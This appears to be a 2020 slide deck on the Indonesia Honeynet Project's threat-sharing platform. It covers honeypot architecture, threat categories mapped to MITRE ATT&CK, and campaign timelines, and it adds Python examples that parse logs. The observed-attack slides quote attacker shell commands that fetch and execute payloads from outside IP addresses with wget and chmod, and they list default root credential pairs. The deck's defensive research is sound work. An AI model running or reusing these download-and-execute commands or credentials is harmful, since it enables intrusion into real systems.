Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10....
Honeynet Threat Sharing Platform
Dr. Charles Lim, CTIA, EDRP, CHFI, ECSA, ECSP, ECIH, CEH, CEI
Swiss German University
9th September 2020
About Me
Dr. Charles Lim, Msc., CTIA, CHFI, EDRP, ECSA, ECSP, ECIH, CEH, CEI
Head of Cyber Security Laboratory (now Security Operation Center)
Researcher – Information Security Research Group and Lecturer
Swiss German University
Charles.lims [at] gmail.com and charles.lim [at] sgu.ac.id
http://people.sgu.ac.id/charleslim
Research Interest
• Malware
• Intrusion Detection
• Vulnerability Analysis
• Digital Forensics
• Cloud Security
Community
• Indonesia Honeynet Project – Chapter Lead
• Academy CSIRT – member
• Asosiasi Forensik Digital Indonesia – member
ISIF Asia Research Grant
Sept 2019
Announcing – ISIF Asia Research Grant
SGU · IHP · BSSN
Agenda
• Honeypots
• Indonesia Honeynet Project Threat Map
• Threat Sharing Platform
• Honeypot-detected Threats
• Analyzing Campaign Timeline
• Research Output
• Q & A
Honeypots
Honeypots
• A decoy system that lures attackers into interacting with it
• It emulates popular services, such as Web, SMB, SSH and others
• It is placed together with other network services
• It does not contain any useful information
Honeypots in the network
How Honeypot works
(Diagram label: LINUX SERVER)
Indonesia Honeynet Project (IHP) Threat Map
Early Warning System (Honeynet Portal at BSSN)
Threat Sharing Platform Architecture
Honeynet Threat Sharing Platform (Architecture)
Data flow shown in the architecture diagram:
• Honeypot Sensors (Org A, Org B, Org C, Org D) send logs, malware and sessions over HPFeeds to the Honeynet Parser Engine
• Honeypot logs are sent from the Parser Engine to the Data Lake (ArangoDB)
• Malware samples are sent to Cuckoo Sandbox for analysis; the Cuckoo Sandbox analysis sends IOCs onward
• Logs are pulled from the Data Lake and sent to the CSC-ISAC MISP Platform
• The Data Lake is pulled into ELK (Dashboard and ELK) and analyzed for any threats
• Security analysts analyze the raw data, perform correlation and investigation, and share investigated alerts to MISP
Exploring Honeypot Detected Threats
Honeynet Threat Channels
Honeynet
Cowrie (Services: SSH)
• PeerIP / Attacking IP address: 35.202.41.48
• Logged in: U: root, P: root
• Commands: wget http://38.68.46.110/x86;
Dionaea (Services: FTP, HTTP, Memcache, MSSQL, MySQL, SMB, TFTP, etc.)
• PeerIP / Attacking IP address: 27.124.26.136
• Connections URL: http://27.124.26.136:59486/tf.exe
• Payload hash: be7802ccf0e44b1d82567059a1abf83e
Honeynet Threat Category (Cowrie) - Partial
Honeynet Cowrie Threat Example
• Attacking IP address: 35.202.41.48
• Shell Command Set (SCSXXX): cd /tmp; wget http://37.49.224.100/zeros6x.sh; chmod 777 zeros6x.sh; ./zeros6x.sh
• URLs: http://37.49.224.100/zeros6x.sh
• Hash: f50da447e130d02cb8abc55b6bf7816878f276ece0ca739750adc1dca7c1ddc5
• Credentials used (multiple instances – user id : password): root : root123 | root : p@ssw0rd | root : 123 | root : password | root : 123456 | root : root
Honeynet Cowrie Threat Category Example
Threat Categories (Shell Command Set - SCSXXX)

| Command | Threat Category | MITRE ATT&CK Technique |
|---|---|---|
| cd /tmp | Usable Directory Discovery | T1083 – File and Directory Discovery |
| wget http://37.49.224.100/zeros6x.sh; | Download Tools | T1105, T843 – Remote File Copy & Program Download |
| chmod 777 zeros6x.sh; | File Permission Modification | T1222 – File and Directory Permissions Modification |
| ./zeros6x.sh | Execution of Tools | T1059 – Command & Scripting Interpreter |
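The mapping in the table above can be automated when a Cowrie session is parsed: split the shell command set into steps, tag each step with a threat category and ATT&CK technique, and derive the technique chain that groups sessions into one pattern code. This is an added example, not code from the IHP platform; the categories and technique IDs follow the table, while the matching regexes, the `Step` record and the extra system-profiling rule (T1082) are my own assumptions.

```python
import re
from dataclasses import dataclass

# Per-command rules for a Cowrie shell command set. Categories and ATT&CK IDs
# follow the slide's table; the regexes are an assumption about how each step
# is recognised. The last rule (system profiling, T1082) is an extension
# suggested by the SCS005 "Sys Profiling" pattern, not taken from the table.
RULES = [
    (re.compile(r"^cd\s+\S+"), "Usable Directory Discovery", "T1083"),
    (re.compile(r"^(?:wget|curl|tftp|ftpget)\b"), "Download Tools", "T1105"),
    (re.compile(r"^chmod\s+(?:[0-7]{3,4}|[ugoa]*\+x)\b"), "File Permission Modification", "T1222"),
    (re.compile(r"^(?:\./\S+|(?:sh|bash)\s+\S+)"), "Execution of Tools", "T1059"),
    (re.compile(r"^(?:uname|cat\s+/proc/cpuinfo|nproc)\b"), "System Profiling", "T1082"),
]

@dataclass
class Step:
    command: str
    category: str
    technique: str

def split_command_set(scs: str) -> list:
    """Split one Cowrie command line on ';', '&&', '||' and '|' into commands."""
    parts = re.split(r"\s*(?:;|&&|\|\||\|)\s*", scs)
    return [p for p in (q.strip() for q in parts) if p]

def classify(scs: str) -> list:
    """Map each command of a shell command set to a category and technique."""
    steps = []
    for cmd in split_command_set(scs):
        category, technique = "Unknown", "-"
        for pattern, cat, tech in RULES:
            if pattern.search(cmd):
                category, technique = cat, tech
                break
        steps.append(Step(cmd, category, technique))
    return steps

def pattern_signature(scs: str) -> str:
    """Technique chain; sessions sharing a chain fall under one pattern code (SCSxxx)."""
    return ">".join(s.technique for s in classify(scs))

def extract_urls(scs: str) -> list:
    """Download URLs in the command set, for the URL field of the threat record."""
    return re.findall(r"https?://[^\s;'\"|&]+", scs)
```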
Threat Correlation (Virustotal Graph)
Graph labels:
• Other possible threats in the chain
• Threats used to attack us
• IP address (country)
Our Threat Sharing Platform (Dashboard)
Public Dashboard
Threat Category Monitoring
Threat Pattern Monitoring
Analyzing Campaign Timeline
Every pattern has its own campaign timeline
Pattern Code = SCS005 – Sys Profiling & Persistence
Timeline annotations: heavy attack pattern; attack "campaign" is stopped
Every pattern has its own campaign timeline
Pattern Code = SCS006 – Disable FW, Tool Execution & Persistence
Attacks are seen only from 10 to 13 May 2020
Every pattern has its own campaign timeline
Pattern Code = SCS010 – Tool Execution and Covering Track
Attacks are seen from 24 May to 5 July 2020
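The per-pattern timelines on the three slides above (first and last sighting, whether a campaign has stopped, and the bursts of activity on the timeline) can be computed directly from parsed sessions once each carries a pattern code. Added example, not the platform's code: the session records are constructed, with dates mirroring the slides and made-up counts, and the 14-day "stopped" threshold and 21-day burst gap are assumptions.

```python
from collections import defaultdict
from datetime import date, timedelta

# Constructed session records (observation date, pattern code). The date ranges
# mirror the slides (SCS006 10-13 May 2020, SCS010 24 May to 5 July 2020); the
# number of sessions per day is made up.
SESSIONS = [
    ("2020-05-10", "SCS006"), ("2020-05-11", "SCS006"), ("2020-05-11", "SCS006"),
    ("2020-05-13", "SCS006"),
    ("2020-05-24", "SCS010"), ("2020-06-02", "SCS010"), ("2020-06-18", "SCS010"),
    ("2020-07-05", "SCS010"),
    ("2020-07-20", "SCS005"), ("2020-07-21", "SCS005"),
]

def campaign_timeline(sessions):
    """Per pattern code: first/last seen, session count and distinct active days."""
    by_code = defaultdict(list)
    for day, code in sessions:
        by_code[code].append(date.fromisoformat(day))
    return {
        code: {"first_seen": min(days), "last_seen": max(days),
               "sessions": len(days), "active_days": len(set(days))}
        for code, days in by_code.items()
    }

def campaign_status(entry, as_of, quiet_days=14):
    """Mark a campaign 'stopped' after quiet_days without a session (threshold assumed)."""
    silent = date.fromisoformat(as_of) - entry["last_seen"]
    return "stopped" if silent > timedelta(days=quiet_days) else "active"

def bursts(sessions, code, gap_days=21):
    """Split one pattern's activity into bursts separated by more than gap_days."""
    days = sorted({date.fromisoformat(d) for d, c in sessions if c == code})
    if not days:
        return []
    runs, start, prev = [], days[0], days[0]
    for d in days[1:]:
        if (d - prev).days > gap_days:
            runs.append((start.isoformat(), prev.isoformat()))
            start = d
        prev = d
    runs.append((start.isoformat(), prev.isoformat()))
    return runs
```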
Similar Attack from the same Threat Actor
• Attacks in May 2020
• Attacks in June 2020
• Attacks in July 2020
Our Research Output
International Conference Paper (ICONETSI)
Questions & Answers (Q&A)